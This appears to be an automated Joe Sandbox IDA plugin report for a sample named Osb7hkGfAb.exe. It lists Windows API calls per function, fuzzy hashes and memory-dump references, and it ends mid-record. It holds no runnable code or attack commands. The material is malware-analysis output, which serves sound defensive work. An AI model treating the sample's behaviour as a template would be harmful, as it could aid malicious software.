• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
• Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
• Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
• Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
• Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
• Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
• Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
• Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
• Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
• Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
APIs
  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
  • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
  • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
  • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
  • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
  • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2972824698-0
                                                                          • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                          • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                          • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                                          • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                          APIs
                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                          • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                                          • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                                          • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                          • GetClientRect.USER32(?,?), ref: 00405407
                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                                          • EmptyClipboard.USER32 ref: 00405686
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                                          • CloseClipboard.USER32 ref: 004056D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                          • String ID:
                                                                          • API String ID: 590372296-0
                                                                          • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                          • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                                          • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\tranchet$Call
                                                                          • API String ID: 2624150263-2053375459
                                                                          • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                          • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                          APIs
                                                                            • Part of subcall function 700E1215: GlobalAlloc.KERNEL32(00000040,700E1233,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E121D
                                                                          • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 700E1BC4
                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 700E1C0C
                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 700E1C16
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1C29
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D09
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D0E
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D13
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1EFA
                                                                          • lstrcpyA.KERNEL32(?,?), ref: 700E2098
                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 700E2114
                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 700E2125
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 700E217E
                                                                          • lstrlenA.KERNEL32(00000408), ref: 700E2198
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                          • String ID:
                                                                          • API String ID: 245916457-0
                                                                          • Opcode ID: d8b8d17d68bd0624a19033669b61e021132add5b717075ef20d5c7219683060a
                                                                          • Instruction ID: b79c79dcf004a5cae387eb7208b4efded1171ab4e3ea6636b71c3ea77b4fe03e
                                                                          • Opcode Fuzzy Hash: d8b8d17d68bd0624a19033669b61e021132add5b717075ef20d5c7219683060a
                                                                          • Instruction Fuzzy Hash: 93229F71D04209DEDB21AFB6C8847EDBBF6BB04B25F2045AED156F2381D7745A81CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                          • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                          • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                                          Strings
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
• Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
• Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
• Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
• ShowWindow.USER32(?), ref: 00403D00
• DestroyWindow.USER32 ref: 00403D14
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
• GetDlgItem.USER32(?,?), ref: 00403D51
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
• IsWindowEnabled.USER32(00000000), ref: 00403D6C
• GetDlgItem.USER32(?,00000001), ref: 00403E1A
• GetDlgItem.USER32(?,00000002), ref: 00403E24
• SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
• GetDlgItem.USER32(?,00000003), ref: 00403F35
• ShowWindow.USER32(00000000,?), ref: 00403F56
• EnableWindow.USER32(?,?), ref: 00403F68
• EnableWindow.USER32(?,?), ref: 00403F83
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
• EnableMenuItem.USER32(00000000), ref: 00403FA0
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
• lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
• SetWindowTextA.USER32(?,0042A890), ref: 00404004
• ShowWindow.USER32(?,0000000A), ref: 00404138
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID:
• API String ID: 184305955-0
• Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
• Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
• Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
• Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
• GetDlgItem.USER32(00000000,000003E8), ref: 00404385
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
• GetSysColor.USER32(?), ref: 004043B4
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
• lstrlenA.KERNEL32(?), ref: 004043D5
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
• GetDlgItem.USER32(?,0000040A), ref: 0040445B
• SendMessageA.USER32(00000000), ref: 0040445E
• GetDlgItem.USER32(?,000003E8), ref: 00404489
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
• LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
• SetCursor.USER32(00000000), ref: 004044E1
• LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
• SetCursor.USER32(00000000), ref: 004044FA
• SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
• SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
Strings
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: Call$N
• API String ID: 3103080414-3438112850
• Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
